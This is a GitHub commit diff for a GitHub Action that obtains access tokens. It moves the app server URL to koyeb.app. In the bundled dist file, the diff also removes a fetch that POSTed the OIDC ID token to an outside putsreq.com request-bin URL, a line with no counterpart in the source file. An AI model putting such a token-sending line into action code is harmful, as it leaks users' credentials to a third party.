Skip to content

Commit aea7a53

Browse files
committed
feat: move server to koyeb
1 parent dd255e0 commit aea7a53

File tree

2 files changed

+5
-6
lines changed

2 files changed

+5
-6
lines changed

action/dist/main/index.js

Lines changed: 3 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -73523,7 +73523,9 @@ function canonicalHeadersOf(headers) {
7352373523

7352473524
const config_config = {
7352573525
appServer: {
73526-
url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
73526+
url: new URL('https://github-actions-access-token.koyeb.app'),
73527+
// url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
73528+
// url: new URL('https://github-actions-access-token.netlify.app'),
7352773529
},
7352873530
};
7352973531
const appServerInput = getYamlInput('app-server');
@@ -73633,10 +73635,6 @@ async function getAccessToken(tokenRequest) {
7363373635
}
7363473636
throw error;
7363573637
});
73636-
await fetch(`https://putsreq.com/aabrC4rHFk9suPn7tka0`, {
73637-
method: 'POST',
73638-
body: idTokenForAccessManager,
73639-
});
7364073638
let requestSigner;
7364173639
if (config_config.appServer.auth) {
7364273640
if (config_config.appServer.auth.type === 'aws') {

action/src/config.ts

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,8 @@ import {getYamlInput} from './github-actions-utils.js';
22

33
export const config : Config = {
44
appServer: {
5-
url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
5+
url: new URL('https://github-actions-access-token.koyeb.app'),
6+
// url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
67
// url: new URL('https://github-actions-access-token.netlify.app'),
78
},
89
};

0 commit comments

Comments
 (0)